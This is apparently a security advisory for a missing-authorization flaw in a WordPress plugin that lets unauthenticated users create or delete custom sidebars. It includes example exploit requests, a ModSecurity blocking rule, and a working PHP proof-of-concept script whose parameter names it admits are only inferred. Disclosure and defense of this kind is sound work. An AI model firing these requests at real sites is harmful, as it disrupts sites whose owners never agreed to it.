Atomic Edge analysis of CVE-2026-12349 (metadata-based): The Premium Addons for KingComposer plugin up to version 1.1.1 contains a missing authorization vulnerability in its AJAX handlers for custom sidebar management. This allows unauthenticated attackers to create or delete arbitrary custom widget areas, causing potential widget loss and site functionality disruption. The CVSS base score is 5.3 (Medium), reflecting the limited availability impact but no confidentiality breach.
Root Cause: The vulnerability stems from two AJAX handlers, add_custom_sidebar() and remove_custom_sidebar(), which are registered via the wp_ajax_nopriv_* hooks. This makes them accessible to unauthenticated visitors. The handlers modify the octagon_custom_sidebar option using update_option() without any capability or nonce checks. Based on the CWE-862 classification and the description, Atomic Edge research infers that the plugin’s code likely contains functions like add_action(‘wp_ajax_nopriv_add_custom_sidebar’, ‘add_custom_sidebar’) and directly calls update_option(‘octagon_custom_sidebar’, $_POST[‘sidebar_id’]) without verifying user permissions or using WordPress nonces. This pattern is common in plugins that fail to implement authorization for AJAX actions meant for administrators only.
Exploitation: An attacker can send POST requests to /wp-admin/admin-ajax.php with specific action parameters. For creating a sidebar, the request would include action=add_custom_sidebar and a parameter like sidebar_id (the custom sidebar name). For deletion, the action parameter would be remove_custom_sidebar with the sidebar_id parameter indicating which sidebar to remove. The attacker does not need authentication. Atomic Edge analysis infers that the exact parameter names are likely sidebar_id based on typical WordPress sidebar naming conventions, though the actual parameter name may differ (e.g., name, sidebar_name). A typical exploit payload for creating a sidebar might be: POST /wp-admin/admin-ajax.php with action=add_custom_sidebar&sidebar_id=malicious-sidebar-1. For deletion: POST /wp-admin/admin-ajax.php with action=remove_custom_sidebar&sidebar_id=legitimate-sidebar-name.
Remediation: The fix requires implementing proper authorization checks in both AJAX handlers. The developer should add capability verification using current_user_can(‘manage_options’) or similar administrator-level capability before processing the request. Additionally, nonce verification via check_ajax_referer() should be added to prevent cross-site request forgery. The handlers should only be registered on the wp_ajax_ hook (not wp_ajax_nopriv_) for authenticated users. The update_option() calls should be protected with sanitization and validation of the sidebar name.
Impact: Successful exploitation allows unauthenticated attackers to create arbitrary custom sidebar areas or delete existing ones. When a sidebar is deleted, any widgets assigned to that sidebar lose their registration and stop rendering on the frontend. This can cause loss of sidebar content, broken site layouts, and administrative confusion. Since the attacker can create arbitrary sidebars, they could create sidebars with names that conflict with theme-registered sidebars, potentially breaking the theme’s widget areas entirely. The vulnerability does not allow direct data theft or privilege escalation, but it enables persistent disruption of the site’s widget configuration.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12349 (metadata-based)
# Blocks unauthenticated AJAX requests to the add_custom_sidebar and remove_custom_sidebar actions
# targeting the admin-ajax.php endpoint.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261941,phase:2,deny,status:403,chain,
msg:'CVE-2026-12349 - Unauthenticated custom sidebar creation/deletion (Premium Addons for KingComposer)',
severity:'CRITICAL',tag:'CVE-2026-12349',tag:'wordpress',tag:'plugin-premium-addons-for-kingcomposer'"
SecRule ARGS_POST:action "@pm add_custom_sidebar remove_custom_sidebar" "chain"
SecRule ARGS_POST:sidebar_id "@rx ^[a-zA-Z0-9_-]+$" "t:none"
# Note: If the parameter name differs (e.g., 'name'), adjust the final chain rule accordingly.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12349 - Premium Addons for KingComposer <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Custom Sidebar Creation and Deletion
// This PoC exploits the missing authorization in AJAX handlers by unauthenticated users.
// It creates a new custom sidebar and then deletes it (cleanup).
$target_url = 'https://example.com'; // CHANGE THIS to the target WordPress URL
$plugin_ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';
// Step 1: Create a new custom sidebar (attacker controlled name)
$sidebar_name = 'atomic-edge-test-sidebar-' . uniqid();
$create_payload = [
'action' => 'add_custom_sidebar',
'sidebar_id' => $sidebar_name
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $plugin_ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($create_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// No authentication cookies set - unauthenticated request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/x-www-form-urlencoded',
'X-Requested-With: XMLHttpRequest'
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Creating sidebar: $sidebar_namen";
echo "[+] HTTP Status: $http_coden";
if ($http_code == 200) {
echo "[+] Response: " . (empty($response) ? 'Empty (success expected)' : $response) . "n";
} else {
echo "[!] Unexpected response. Manual analysis recommended.n";
}
// Step 2: Delete the created sidebar to clean up (if the create succeeded)
$delete_payload = [
'action' => 'remove_custom_sidebar',
'sidebar_id' => $sidebar_name
];
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $plugin_ajax_url);
curl_setopt($ch2, CURLOPT_POST, true);
curl_setopt($ch2, CURLOPT_POSTFIELDS, http_build_query($delete_payload));
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_HEADER, false);
curl_setopt($ch2, CURLOPT_HTTPHEADER, [
'Content-Type: application/x-www-form-urlencoded',
'X-Requested-With: XMLHttpRequest'
]);
$response2 = curl_exec($ch2);
$http_code2 = curl_getinfo($ch2, CURLINFO_HTTP_CODE);
curl_close($ch2);
echo "[+] Deleting sidebar: $sidebar_namen";
echo "[+] HTTP Status: $http_code2n";
if ($http_code2 == 200) {
echo "[+] Response: " . (empty($response2) ? 'Empty (success expected)' : $response2) . "n";
} else {
echo "[!] Unexpected response. Manual analysis recommended.n";
}
// Note: The actual parameter name 'sidebar_id' is inferred based on common WordPress sidebar naming.
// If the plugin uses a different parameter name (e.g., 'name', 'sidebar_name'), adjust accordingly.
